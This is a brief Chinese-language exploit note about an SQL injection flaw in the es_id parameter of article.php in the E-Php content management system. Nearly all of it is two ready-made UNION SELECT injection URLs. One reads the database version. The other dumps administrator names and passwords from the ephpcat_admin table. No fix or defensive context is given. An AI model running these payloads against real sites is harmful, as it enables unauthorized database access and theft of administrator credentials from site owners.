E-Php 内容管理系统 SQL 注射漏洞利用:

    E-Php 内容管理系统,E-Php Content Management System (CMS),article.php 页面存在 SQL 注射漏洞。

漏洞测试:Exploit

    http://127.0.0.1/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12

    http://127.0.0.1/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin